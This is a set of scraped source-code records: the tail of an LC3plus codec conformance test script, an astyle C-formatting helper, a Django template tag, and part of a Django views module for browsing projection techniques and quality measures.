mode, item, fs, sr, br, infile in sqam_configs(env.config, items , modes=modes, lp20=False):\n if sr >= 44100:\n tests.append((mode, item, fs, sr, br, infile))\n return test_executor(env, func, tests)\n\n\ndef test_bitrate_switching(env):\n print('Testing bitrate switching ...')\n def func(mode, item, fs, sr, bitrates):\n br = (int(160000 / fs), max(bitrates))\n infile = ITEM_DIR / '{}_{}_1ch.wav'.format(item, sr)\n ok, values = process_item(env, mode, item, fs, sr, br, infile)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = []\n for mode, fs, sr, bitrates in env.config['configs']:\n for item in ITEMS:\n tests.append((mode, item, fs, sr, bitrates))\n return test_executor(env, func, tests)\n\n\ndef test_bandwidth_switching(env):\n print('Testing bandwidth switching ...')\n def func(mode, item, fs, sr, br, infile):\n bwf = generate_switching_file(env, *BAND_WIDTHS[sr])\n ok, values = process_item(env, mode, item, fs, sr, br, infile, bwf)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS):\n if sr >= 16000:\n tests.append((mode, item, fs, sr, br, infile))\n return test_executor(env, func, tests)\n\n\ndef test_plc(env):\n print('Testing packet loss concealment ...')\n def func(mode, item, fs, sr, br, infile):\n pattern = 'etc/plc_fer_eid.dat'\n ok, values = process_item(env, mode, item, fs, sr, br, 
infile, None, 0, 'fer', pattern)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = sqam_configs(env.config, ITEMS_PLC, modes=['decode'])\n return test_executor(env, func, tests)\n\n\ndef test_pc(env):\n print('Testing partial concealment ...')\n def func(mode, item, fs, sr, br, infile):\n pattern = 'etc/pc_ber_3percent.dat'\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, 4, 'ber', pattern)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = sqam_configs(env.config, ITEMS_PLC, modes=['decode'])\n return test_executor(env, func, tests)\n\n\ndef test_ep_correctable(env):\n print('Testing channel coder for correctable frames ...')\n def func(mode, item, fs, sr, br, infile, ep_mode):\n pattern = (ep_mode - 1, 50)\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, 'flip', pattern)\n return [ok, mode, item, fs, sr, br, ep_mode] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS):\n for ep_mode in [1, 2, 3, 4]:\n tests.append((mode, item, fs, sr, br, infile, ep_mode))\n return test_executor(env, func, tests)\n\n\ndef test_ep_non_correctable(env):\n print('Testing channel coder for non-correctable frames ...')\n def func(mode, item, fs, sr, br, infile, ep_mode):\n pattern = (int(br * ep_mode * fs / 24000), 50)\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, 'flip', pattern)\n return [ok, mode, item, fs, sr, br, ep_mode] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS):\n for ep_mode in [1, 2, 3, 4]:\n tests.append((mode, item, fs, sr, br, infile, ep_mode))\n return test_executor(env, func, tests)\n\n\ndef test_ep_mode_switching(env):\n print('Testing ep-mode switching ...')\n ep_mode = generate_switching_file(env, 100, 200, 300, 400)\n def func(mode, item, fs, sr, br, infile):\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, None, None)\n return [ok, mode, item, fs, sr, br, '1-4'] + values\n\n tests = sqam_configs(env.config, ITEMS)\n return test_executor(env, func, tests)\n\n\ndef test_ep_combined(env):\n print('Testing combined channel coder for correctable frames ...')\n def func(mode, item, fs, sr, br, infile, ep_mode):\n pattern = (ep_mode - 1, 50)\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, 'flip', pattern)\n return [ok, mode, item, fs, sr, br, ep_mode] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS, ch=2):\n if br <= 128000:\n for ep_mode in [1, 2, 3, 4]:\n tests.append((mode, item, fs, sr, br, infile, ep_mode))\n\n return test_executor(env, func, tests)\n\n\ndef test_ep_combined_nc(env):\n print('Testing combined channel coder for non-correctable frames ...')\n def func(mode, item, fs, sr, br, infile, ep_mode):\n pattern = (int(br * ep_mode * fs / 24000), 50)\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, 'flip', pattern)\n return [ok, mode, item, fs, sr, br, ep_mode] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS, ch=2):\n if br <= 128000:\n for ep_mode in [1, 2, 3, 4]:\n tests.append((mode, item, fs, sr, br, infile, ep_mode))\n return test_executor(env, func, tests)\n\n\ndef pass_ratio(results):\n num_passed = sum(ok for ok, *_ in results)\n return num_passed / len(results) if results else 1.0\n\n\ndef profile_passed(all_results):\n flat_results = itertools.chain(*all_results.values())\n return all(ok for ok, 
*_ in flat_results)\n\n\ndef gen_td(value):\n if type(value) in (tuple, list) and len(value) == 3:\n value, clazz, thresh = value\n clazz = ' class={}'.format(clazz) if clazz else ''\n thresh = ' ({})'.format(fstr(thresh)) if thresh != None else ''\n return '{}{}'.format(clazz, fstr(value), thresh)\n else:\n return '{}'.format(lstr(value))\n\n\ndef gen_table(test, mode, config, results):\n mkey = '{}_{}_metric'.format(test, mode)\n metric = config[mkey]\n header = HEADER_ALL.copy()\n if test == 'band_limiting':\n header += HEADER_BL\n if test.startswith('ep_'):\n header += HEADER_EP\n if mode == 'decode':\n header += HEADER_EPD\n header += HEADER_METRIC[metric]\n buf = '\\n'\n buf += ''.join(''.format(x) for x in header)\n buf += '\\n'\n for values in results:\n buf += ''\n buf += ''.join(map(gen_td, values[1:]))\n buf += '\\n'\n return buf + '
    {}
    \\n'\n\n\ndef gen_div(test, config, results):\n percent = round(100 * pass_ratio(results))\n buf = HTML_DIV.format(label=LABEL[test], percent=percent)\n for mode in TEST_MODES:\n mode_results = [r for r in results if r[1] == mode]\n if mode_results:\n buf += gen_table(test, mode, config, mode_results)\n return buf + '
    \\n'\n\n\ndef save_html(profile, config, all_results, html_file):\n ok = profile_passed(all_results)\n state = ('failed', 'passed')[ok]\n buf = HTML_HEAD.format(title=profile, style=STYLE, state=state)\n for test in TESTS:\n if test in all_results:\n buf += gen_div(test, config, all_results[test])\n buf += '\\n'\n\n with open(html_file, 'w') as f:\n f.write(buf)\n\n\ndef main(args):\n args.workers = min(max(args.workers, 1), os.cpu_count())\n time_stamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M')\n log_file = 'lc3_conformance_{}.log'.format(time_stamp)\n log_handlers = [logging.FileHandler(log_file)]\n if args.verbose:\n log_handlers += [logging.StreamHandler(sys.stdout)]\n logging.basicConfig(level=logging.DEBUG, handlers=log_handlers)\n work_dir = makedirs(pathlib.Path('lc3_conformance_' + time_stamp))\n\n try:\n all_passed = True\n globels, configs = parse_config(args.config)\n profiles = globels['enabled_tests']\n check_system(args, globels)\n build_tools()\n if not args.system_sox:\n download_sox()\n prepare_items(args.workers)\n\n for profile in profiles:\n print('Running tests for \"{}\" ...'.format(profile))\n config = configs[profile]\n all_results = {}\n for test in TESTS:\n test_test = 'test_' + test\n if config[test_test]:\n test_dir = makedirs(work_dir / profile / test)\n test_env = TestEnv(profile, test, config, test_dir, args.workers)\n test_func = globals()[test_test]\n test_result = test_func(test_env)\n if not test_result:\n print('{} in \"{}\" is enabled with no suitable configuration!'.format(test, profile))\n all_results[test] = test_result\n if not args.keep_files:\n removedir(work_dir / profile / test)\n\n if all_results:\n all_passed = all_passed and profile_passed(all_results)\n html_file = '{}_{}.html'.format(profile, time_stamp)\n print('Saving results ...')\n save_html(profile, config, all_results, html_file)\n else:\n print('No tests in \"{}\" were enabled!'.format(profile))\n\n print('\\nLogfile:', log_file)\n print('Results:', ' \\n'.join('%s_%s.html' % (p, time_stamp) for p in profiles))\n print('\\nConformance test', 'passed.' if all_passed else 'failed!', '\\n')\n sys.exit(0 if all_passed else 1)\n except KeyboardInterrupt:\n print('\\rExiting. 
Please wait while workers shut down ...')\n finally:\n if not args.keep_files:\n removedir(work_dir)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='LC3plus conformance tool - checks if your version of the LC3plus cod'\n 'ec conforms to the reference provided by Fraunhofer & Ericsson.')\n parser.add_argument('-keep', action='store_true', dest='keep_files', help=\"Don't delete workdir at end of test\")\n parser.add_argument('-system_sox', action='store_true', help='Use system sox')\n parser.add_argument('-v', action='store_true', dest='verbose', help='Activate verbose output')\n parser.add_argument('-w', dest='workers', type=int, default=os.cpu_count(), help='Number of worker threads')\n parser.add_argument('config', help='Conformance config file')\n args = parser.parse_args()\n\n if args.system_sox:\n SOX_EXE = 'sox'\n\n main(args)\n","repo_name":"marzzzello/LC3plus","sub_path":"conformance/lc3_conformance.py","file_name":"lc3_conformance.py","file_ext":"py","file_size_in_byte":41157,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"34"} +{"seq_id":"19180451259","text":"import os\nimport sys\nimport subprocess\nfrom pathlib import Path\nfrom re import match\nfrom shutil import which\n\n# ANSI escape sequences used to print colored text\n# [ref](https://stackoverflow.com/a/287944)\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'
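\n# Editor's usage note: these codes wrap text in ANSI escape sequences, e.g.\n#   print(bcolors.WARNING + 'formatting skipped' + bcolors.ENDC)\n# prints yellow on terminals that honour them; ENDC resets the colour.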
\n\n# Get file path\ndir = Path(os.path.dirname(__file__))\n\n# astyle formatter configuration paths\nastyle_config = Path('astylerc')\nastyle_path = Path.joinpath(dir, Path('.vscode'))\n\n# Find a file (`filename`) under the given search path (`search_path`)\ndef find_files(filename, search_path):\n result = []\n for root, dir, files in os.walk(search_path):\n if filename in files:\n result.append(os.path.join(root, filename))\n return result\n\n# Check that the `astyle` command exists\nif which('astyle') is None:\n sys.exit(bcolors.FAIL + '\\'astyle\\' command does not exist.' + bcolors.ENDC)\n\n# Check that the astyle option file (configuration file) exists\nif not find_files(str(astyle_config), str(astyle_path)):\n sys.exit(bcolors.FAIL + 'Cannot find %s file in \\'%s\\'.' % (astyle_config, astyle_path) + bcolors.ENDC)\n\n# Apply the format option to every *.c and *.h file, except files inside Git-related folders (submodules, etc.)\ndir_list = list(filter(lambda name: not name.startswith('.'), os.listdir(dir)))\nfor item in dir_list:\n dir_absolute_path = Path.joinpath(dir, Path(item))\n if os.path.isdir(dir_absolute_path) and not find_files(str('.git'), str(dir_absolute_path)):\n subprocess.run(['astyle',\n '--options=%s' % str(Path.joinpath(astyle_path, astyle_config)),\n '--recursive',\n str(Path.joinpath(dir_absolute_path, Path('*.c,*.h')))])\n\n# Apply to every *.c and *.h file in the root of the project folder\nprint('------------------------------------------------------------')\nprint('Finding *.c and *.h files from the root of \\'%s\\'' % (dir))\nprint('------------------------------------------------------------')\n# anchor the pattern so *.cpp and similar extensions are not picked up\nfiles_in_root_dir = list(filter(lambda v: match(r'.*\\.[ch]$', v), dir_list))\n\nif not files_in_root_dir:\n print(\"Nothing to change.\")\nelse:\n for item in files_in_root_dir:\n subprocess.run(['astyle',\n '--options=%s' % str(Path.joinpath(astyle_path, astyle_config)),\n str(Path.joinpath(dir, Path(item)))])\n\n# Print a finish message\nprint(bcolors.OKGREEN + \"\\nFormat completed.\" + bcolors.ENDC)\n","repo_name":"NyankoTear/c-formatter","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13818676056","text":"from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef active_if_contains(context, url_part):\n request = context['request']\n if url_part in request.path:\n return \"active\"\n else:\n return \"\"
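\n\n# Editor's usage sketch (assumed template markup, not from this repo):\n#   {% load activelink %}\n#   <li class=\"{% active_if_contains '/events/' %}\">Events</li>\n# marks the item active whenever '/events/' occurs in request.path.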
\n","repo_name":"UrLab/incubator","sub_path":"incubator/templatetags/activelink.py","file_name":"activelink.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"41802813174","text":"from django.shortcuts import render\nfrom django.forms.models import model_to_dict\nfrom .models import *\nfrom django.db.models import Q, Count\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Allow to filter horizontal ie search bar for references in admin\n# Allow to clear options for range section and also for tasks input/output space\n# The single_select option only needs to be there when All is selected. For any, multi-select should be allowed.\n# Task when displaying results in the advanced section, should the children be left out?\n# When reloading the page after a query, don't reset the state of the buttons. I think this should be taken care of\n# by an AJAX request though.\n\n# Have a clear all selected options button. Just have a div within which all the options are present.\n# Find all elements that are buttons within that div and reset their state.\n# Tables\n# QM - Done both Basic and Advanced\n# Langs - Both MDPs and Langs done\n# Task - Done both Basic and Advanced\n# MDP - Done but have to make get changes to basic\n# Enrichment - Not started\n\n# Things to check with Dr. Michael\n# What to call the QM_Parameter Options\n# How to introduce the child tasks section etc in the Task Table\n\n# Create your views here.\n# https://stackoverflow.com/questions/52428124/django-manytomany-field-returns-none-but-it-has-related-records\n# https://stackoverflow.com/questions/48176774/django-path-doesnt-find-the-right-primary-key-in-url-path\n# https://stackoverflow.com/questions/21925671/convert-django-model-object-to-dict-with-all-of-the-fields-intact\n# https://stackoverflow.com/questions/14456503/how-to-get-a-particular-attribute-from-queryset-in-django-in-view\n# https://stackoverflow.com/questions/4424435/how-to-convert-a-django-queryset-to-a-list Check itertools here\n# Retrieving many-to-many field information from a returned queryset\n# https://stackoverflow.com/questions/52428124/django-manytomany-field-returns-none-but-it-has-related-records\n# Checking the size of a passed parameter from within the template. If the size is 0 then we don't have to render the\n# element. This can prevent subsection headings from being rendered even when there is no information to be displayed\n# within the subsection.\n# https://stackoverflow.com/questions/902034/how-can-i-check-the-size-of-a-collection-within-a-django-template\n# Checking variable values passed back using the url\n# https://stackoverflow.com/questions/150505/capturing-url-parameters-in-request-get\n# Q objects\n# https://stackoverflow.com/questions/20222457/django-building-a-queryset-with-q-objects\n# https://stackoverflow.com/questions/8144582/django-how-do-i-use-a-string-as-the-keyword-in-a-q-statement\n# Viewing raw SQL Queries\n# https://stackoverflow.com/questions/971667/how-to-view-corresponding-sql-query-of-the-django-orms-queryset\n# Setting up the django debug toolbar https://www.youtube.com/watch?v=XdArRS9kP6U\n# https://stackoverflow.com/questions/971667/how-to-view-corresponding-sql-query-of-the-django-orms-queryset\n\n# https://stackoverflow.com/questions/14327036/count-vs-len-on-a-django-queryset\n# https://stackoverflow.com/questions/27213752/collecting-staticfiles-throws-improperlyconfigured\n# Django modifying admin templates\n# https://stackoverflow.com/questions/398163/ordering-admin-modeladmin-objects\n# https://books.agiliq.com/projects/django-admin-cookbook/en/latest/set_ordering.html\n# https://stackoverflow.com/questions/12308530/how-to-catch-specific-error-in-any-template-in-django\n# https://stackoverflow.com/questions/20952156/how-to-pass-javascript-variable-to-django-custom-filter\n# https://stackoverflow.com/questions/47648886/difference-between-strdict-and-json-dumpsdict\n# https://stackoverflow.com/questions/1413122/is-autoescape-off-in-django-safe\n# https://stackoverflow.com/questions/45163299/django-group-by-field-value\n# https://stackoverflow.com/questions/12809416/django-static-files-404\n# https://docs.djangoproject.com/en/2.0/ref/models/instances/#django.db.models.Model.get_FOO_display\n# https://www.revsys.com/tidbits/tips-using-djangos-manytomanyfield/
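\n\n# Editor's sketch of the Q-object pattern the query generators below rely on\n# (building the field lookup as a string, then unpacking it as a keyword):\n#   q = ~Q(**{'dissimilarity_id': None})   # \"field is not NULL\"\n#   q &= ~Q(**{'ordinal_id': None})        # AND a second condition\n#   MDP.objects.filter(q)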
'task_type'], ['Input Space', 'input_space'], ['Output Space', 'output_space'],\n ['Actor', 'actor'], ['Target Space', 'ts']\n ]\nparameter_text = [['Local', 'Global'], ['Dissimilarity', 'Correlation', 'Probability', 'Rank', 'Geometric',\n 'Set Difference', 'Homology'],\n ['Range', 'Best']]\nfilter_options = ['All', 'Any', 'Inc', 'Exc']\nprojtech_fieldname = ['mdp_fullname', 'mdp_name']\ntxtdisp_data = ['Dissimilarity', 'Ordinal', 'Cartesian', 'Neighbouring Structures', 'Categorical']\ntxtdisp_tax = [((i.split('_id')[0]).replace('_', ' ')).title() for i in tax_fieldnames]\n# A list of sublists where sublist[0] = Parameter Display Name\n# sublist[1] = Parameter Query Name\n# sublist[2] = Parameter used to query returned object\ntask_fields = [\n ['Task Type', 'task_type', 'type_name', 'ttype'],\n ['Input Space', 'input_space', 'mathjaxeqn', 'inpsp'], ['Output Space', 'output_space', 'mathjaxeqn', 'outsp'],\n ['Actor', 'actor', None, 'act'], ['Target Space', 'ts', 'mathjaxeqn', 'ts'],\n ['MDP Property', 'task_property', 'mdp_property', 'prop'],\n ['Best Matching MDPs', 'best_mdp_list', 'best_matching_mdp', 'bestmatch'],\n # ['Parent Task', 'parent_id', 'task_name'],\n # ['Reference', 'reference_list', None]\n]\n\n\ndef getvalues(queryset, fieldnames):\n data = []\n for i in range(len(fieldnames)):\n data.append(getattr(queryset, fieldnames[i]))\n return data\n\n\ndef mdpbasic(request, pk=None):\n # This data will be for the mdp list. I am not going to be displaying the full name but only the short form since\n # otherwise it doesn't look very appealing visually. However, since the user is allowed to search by the projection\n # name, I also want them to be able to search by the full name. Thus, I put that full name within a span element and\n # set it's display attribute to none. So, it won't be visible but the filter can still see the value.\n data = MDP.objects.values('mdp_name', 'mdp_fullname', 'mdp_id').order_by('mdp_id')\n # Will contain a dictionary of the handling ability id and the text mapped to that id. So that I don't have to\n # make queries for every single attribute in the database whenever i need to fetch the text.\n handling_text = {}\n for c in HandlingAbility.objects.all():\n handling_text[c.id] = c.technique_handling_ability\n # using get will return the verbose name of the object retrieved. 
In order to access the individual attributes,\n # we can either use the dot operator or python's getattr function\n try:\n projection_technique = MDP.objects.get(mdp_id=pk)\n # No need to use filter here because we will only be retrieving one item\n complexity = (MathJaxFormulas.objects.get(id=projection_technique.complexity_id)).mathjaxeqn\n datatype_vals = getvalues(projection_technique, data_type_fieldnames)\n tax_vals = getvalues(projection_technique, tax_fieldnames)\n projtech_name = getvalues(projection_technique, projtech_fieldname)\n # print(datatype_vals)\n # datatype_vals = (list(projection_technique.values_list('dissimilarity_id', 'ordinal_id', 'cartesian_id',\n # 'ne_structures_id', 'categorical_id'\n # )\n # )\n # )[0]\n reference = projection_technique.reference_paper\n print(projection_technique.variant_refs.all())\n # These numbers are those that don't have a projection technique associated with them in the paper\n variant_ref_nos = projection_technique.variant_refs.all()\n # These are those that have a name associated with them ex: iPCA\n # Up to .all(), this returns a set of objects from the variants table and then we retrieve only the\n # variant_name and variant_references attributes in a queryset.\n # need to typecast the tuples into a list so that I can modify them later on. That's why list(i)\n tech_variants = [list(i) for i in\n list(projection_technique.tech_variants.all().values_list('variant_name', 'variant_reference'))]\n variant_refs = [variant_ref for (_, variant_ref) in tech_variants]\n # This will give us the __str__ of the object which will have both the id as well as the citation text\n ref_vals = Reference.objects.filter(id__in=variant_refs)\n for tech_variant in tech_variants:\n for ref_val in ref_vals:\n if tech_variant[1] == ref_val.id:\n tech_variant[1] = ref_val\n description = projection_technique.description\n # print(tech_variants, ref_vals)\n return render(request, 'mdpbasic.html',\n {\"mdp_list\": data, \"projtechname\": projtech_name,\n \"handling_text\": handling_text,\n \"text_display\": txtdisp_data, \"data_type_vals\": datatype_vals,\n \"text_tax\": txtdisp_tax, \"tax_vals\": tax_vals,\n \"complexity\": complexity, \"reference\": reference,\n \"varrefno\": variant_ref_nos, \"tech_variants\": tech_variants,\n \"description\": description,\n \"reroute_string\": \"mdpbasic\",\n 'got_item': True}\n )\n except ObjectDoesNotExist:\n return render(request, 'mdpbasic.html',\n {'mdp_list': data, 'got_item': False,\n 'reroute_string': \"mdpbasic\"}\n )\n\n\n\n\ndef qmbasic(request, pk=None):\n data = QualityMeasure.objects.values('measure_name', 'measure_id').order_by('measure_id')\n try:\n measure_method = QualityMeasure.objects.get(measure_id=pk)\n # No need to use filter here because we will only be retrieving one item\n rangee = measure_method.rangee\n field_vals = []\n qm_fieldsets = [value for _, value in qm_fieldnames.items()]\n # field_vals is a list of lists. Each list within the main list has exactly 2 elements (also lists). The first\n # element contains the values returned from the query corresponding to a particular section. Example for the Span\n # section we get the values [None, None] for example corresponding to ['Local', 'Global'] in the second element\n # The filter chaining in the template can be understood based on this. There are 2 possible objects that can be\n # returned as can be inferred from above i.e. a mathjaxformula object or a qm_parameter object. 
So in the template\n # I am checking if the object contains the mathjaxeqn parameter and if it doesn't I know it is a qm_parameter option\n # and then I can go for the parameter_option passed through the filter\n for index in range(len(qm_fieldsets)):\n fieldset = qm_fieldsets[index]\n field_vals.append([list(getvalues(measure_method, fieldset)), parameter_text[index]])\n references = measure_method.reference.all()\n description = measure_method.description\n print(qm_fieldnames.items(), field_vals, sep='\\n')\n\n return render(request, 'qmbasic.html',\n {\"qm_list\": data, \"measure_method\": measure_method,\n \"qm_fielditems\": qm_fieldnames.items(),\n \"parameter_text\": parameter_text,\n \"field_vals\": field_vals,\n \"references\": references,\n \"description\": description,\n \"reroute_string\": \"qmbasic\",\n 'got_item': True,\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'qmbasic.html',\n {'qm_list': data, 'got_item': False,\n \"reroute_string\": \"qmbasic\",}\n )\n\ndef taskbasic(request, pk=None):\n # If it is a child task, then we need to use the parent_id to retrieve the\n # reference from the parent. This is because only the parent will have the reference number.\n data = Task.objects.values('task_name', 'task_id').order_by('task_id')\n try:\n task_retd = Task.objects.get(task_id=pk)\n description = task_retd.description\n parent_id = task_retd.parent_id\n numbers_ids = task_retd.numbers\n parent_obj = None\n numbers = None\n children = None\n if parent_id:\n print((Task.objects.get(task_id=parent_id.task_id)).task_id)\n parent_obj = getvalues(Task.objects.get(task_id=parent_id.task_id),\n ['task_id', 'task_name', 'reference_list'])\n reference = parent_obj[2]\n else:\n reference = task_retd.reference_list\n child_objs = task_retd.child_id.all()\n if child_objs:\n children = child_objs.values('task_id', 'task_name')\n if numbers_ids:\n numbers = numbers_ids.all().values('task_id', 'task_name')\n print(task_fields)\n return render(request, 'taskbasic.html',\n {\"task_list\": data, \"task_fields\": task_fields,\n \"task_retd\": task_retd, \"reference\": reference, \"children\": children, \"parent_obj\": parent_obj,\n \"numbers\": numbers, \"description\": description,\n \"reroute_string\": \"taskbasic\",\n 'got_item': True\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'taskbasic.html',\n {'task_list': data, 'got_item': False,\n 'reroute_string': \"taskbasic\"}\n )\n\n\ndef get_lang_vals(object_data, parameter_name, language_data):\n language_data[parameter_name] = []\n for language in object_data.all():\n language_data[parameter_name].append([\n getvalues(language, ['language_id', 'language_name', 'description']),\n language.toolboxes_suppd.all()\n ])\n return language_data\n\n\ndef lang_mdps(request, pk=None):\n # If it is a child task, then we need to use the parent_id to retrieve the\n # reference from the parent. 
This is because only the parent will have the reference number.\n data = MDPsForLang.objects.values('mdp_name', 'mdp_id').order_by('mdp_id')\n try:\n projtech_retd = MDPsForLang.objects.get(mdp_id=pk)\n description = projtech_retd.description\n language_data = {}\n language_data = get_lang_vals(projtech_retd.circle_list, \"Toolboxes_list\", language_data)\n language_data = get_lang_vals(projtech_retd.square_list, \"Libraries_List\", language_data)\n references = projtech_retd.reference_list.all()\n print(language_data)\n\n return render(request, 'lang_mdps.html',\n {\"methods_list\": data,\n \"proj_name\": projtech_retd.mdp_name, \"description\": description,\n \"language_data\": language_data, \"references\": references,\n \"reroute_string\": \"lang_mdps\", \"got_item\": True,\n \"inter_route\": \"lang_langs\"\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'lang_mdps.html',\n {\"methods_list\": data,\n \"reroute_string\": \"lang_mdps\", \"got_item\": False\n }\n )\n\ndef get_operator(request):\n operator = \"~\" if (request.GET.get(\"Exc\", '') == \"Yes\") else \"\"\n if request.GET.get(\"All\", '') == \"Yes\":\n operator += \"&\"\n else:\n operator += \"|\"\n return operator\n\ndef nonetype_query_generator_fn(request, field_name_list, id_field = \"mdp_id\"):\n # Since the fields we are going to be querying from are strings, I'm putting the string of the column name into a\n # dictionary and packing it using the ** operator to pass as an argument. If the request returns the value Yes, that\n # means that the object was selected. We put the column string as the key of the dictionary and have the value as\n # None. This is because if the Include button is selected (as by default), we will be forming the query as\n # ~Q(parameter_name = None) so that all objects for which the parameter_name is not None will be returned in the\n # queryset.\n options = {}\n # # Basically if the Exc button has been selected that means we need to search for all the objects in which the\n # # parameters OTHER than the ones currently selected are non-null. So that means if dissimilarity is selected and\n # # so is exclude, that means we need to search for non-null values in every field EXCEPT for dissimilarity.\n # # The below code section will do that.\n for query_obj in field_name_list:\n request_val = request.GET.get(query_obj,'')\n # range_eqn not in query obj is used in the case of the qm advd section. This is because to render the rangee\n # section, we are not using the rangee field name but instead getting the mathjaxeqns. So range_eqn15 and so on\n # don't actually corresponds to fields in the database and so if we try to query from such fields we will get\n # errors. That's why the second if condition has been put. Objects with range_eqn15 will be handled separately.\n if request_val == \"Yes\" :\n # The database represents the absence of a value in a field using None. However, this is not the \"None\"\n # but the None datatype. 
And so we have to use None and not \"None\".\n options[query_obj] = None\n operator = get_operator(request)\n queries = Q()\n for key in options:\n # This will take care of the case where ALL techniques that are capable of handling a particular property\n # need to be retrieved.\n base_query = Q(**{key: options[key]})\n if \"&\" in operator:\n if \"~\" in operator:\n queries &= base_query\n else:\n queries &= (~base_query)\n # This will take care of the case where ANY techniques that are capable of handling a particular property\n # need to be retrieved.\n else:\n if \"~\" in operator:\n queries |= base_query\n else:\n queries |= (~base_query)\n # When the advanced pages are first rendered no fields are selected by default. So the options field doesn't\n # contain any parameters and as a results, queries is empty i.e. there is no filter applied to the objects. Thus,\n # the objects will be returned the first time the page is rendered and all the techniques will be displayed in the\n # results section. To circumvent this, I check if options is empty and if it is, I check for all objects where the\n # id field is NULL. Since the id field is a primary key and can't ever be NULL, no objects will be returned. This\n # is why the options parameter also needs to be passed back. On the advanced pages where both the reg and none_type\n # query generator are used, both option dictionaries need to be checked before it can be concluded that no options\n # was selected.\n return (queries, options)\n\n\ndef mdpadvanced(request):\n link_data = list(zip(data_type_fieldnames, txtdisp_data))\n link_props = list(zip(tax_fieldnames, txtdisp_tax))\n queries, options = nonetype_query_generator_fn(request, data_type_fieldnames + tax_fieldnames)\n if not options:\n queries = Q(**{\"mdp_id\": None})\n print(queries)\n results = MDP.objects.filter(queries).values('mdp_id', 'mdp_name', 'mdp_fullname')\n # print(results)\n # print(len(results), results)\n return render(request, \"mdpadvanced.html\",\n {\n \"link_data\": link_data, \"link_props\": link_props,\n \"filter_options\": filter_options, \"results\": results,\n \"reroute_string\": \"mdpbasic\",\n })\n\ndef reg_query_generator_fn(request, regquery_strings, trivial_string = \"range_eqn\", field_name = \"rangee\"):\n # For the none_type query generator, each string that was passed as an options key was unique. However here,\n # range_eqn15 and range_eqn16 both correspond to one key i.e. the rangee field in the main table. This is why on the\n # site, we need to make sure that when only 1 button in the range section has been selected because each technique\n # can have only one range formula. The same will apply for when we are doing the input space.\n options = {}\n for query_obj in regquery_strings:\n request_val = request.GET.get(query_obj,'')\n # Suppose range_eqn15 gives us the value true, we need only the integer value to query against the rangee_id\n # field in the database. The trivial string here is range_eqn, so we split on that and take the 2nd element of\n # the list which is the id. So now that we have the id of the field, we want to check if the id is present in\n # the rangee field. 
But since we have the range id and not the value of the equation, we need to use rangee_id\n # not just rangee and that's why I have added the _id below.\n if request_val == \"Yes\":\n try:\n id_obtd = int(query_obj.split(trivial_string)[1])\n except ValueError:\n id_obtd = query_obj.split(trivial_string)[1]\n if field_name != \"best\" and field_name != \"actor\":\n options[(field_name+\"_id\")] = id_obtd\n # best is the only field that will be passed to this function that will not use a foreign key. so in that\n # case we should not be adding _id to the end of it because best_id doesn't exist.\n else:\n options[(field_name)] = id_obtd\n break\n operator = get_operator(request)\n queries = Q()\n for key in options:\n # This will take care of the case where ALL techniques that are capable of handling a particular property\n # need to be retrieved.\n base_query = Q(**{key: options[key]})\n if \"&\" in operator:\n if \"~\" in operator:\n queries &= (~base_query)\n else:\n queries &= base_query\n # This will take care of the case where ANY techniques that are capable of handling a particular property\n # need to be retrieved.\n else:\n if \"~\" in operator:\n queries |= (~base_query)\n else:\n queries |= base_query\n return (queries, options)\n\n\ndef qmadvanced(request):\n qmfield_strings = []\n for i in qm_fieldnames.values():\n qmfield_strings += i\n # In the view we will use the dictionary to dynamically display sections. Except for the rangee parameter. There\n # instead of just displaying rangee text, we will instead query for all the objects from mathjaxeqns whose type is\n # rangee and then display those as options. We just need to append those generated ids to qm_fieldstrings\n # before generating the queries. The id for the range objects will be range_eqn_16 for an equation whose id is 16.\n range_options = list(MathJaxFormulas.objects.filter(equation_type_id=2).values_list('mathjaxeqn', 'id'))\n # print(range_options)\n qmfield_strings.remove('rangee')\n qmfield_strings.remove('best')\n regquery_strings = [\"range_eqn\"+str(id) for _, id in range_options]\n best_query_strings = ['best0', 'best1']\n queries, options1 = nonetype_query_generator_fn(request, qmfield_strings, 'measure_id')\n reg_queries, options2 = reg_query_generator_fn(request, regquery_strings)\n best_queries, options3 = reg_query_generator_fn(request, best_query_strings, 'best', 'best')\n # print(reg_queries)\n # range_eqn not in query obj is used in the case of the qm advd section. This is because to render the rangee\n # section, we are not using the rangee field name but instead getting the mathjaxeqns. So range_eqn15 and so on\n # don't actually corresponds to fields in the database and so if we try to query from such fields we will get\n # errors. That's why the second if condition has been put. Objects with range_eqn15 will be handled separately.\n operator = get_operator(request)\n # The individual query generator functions have already handled for 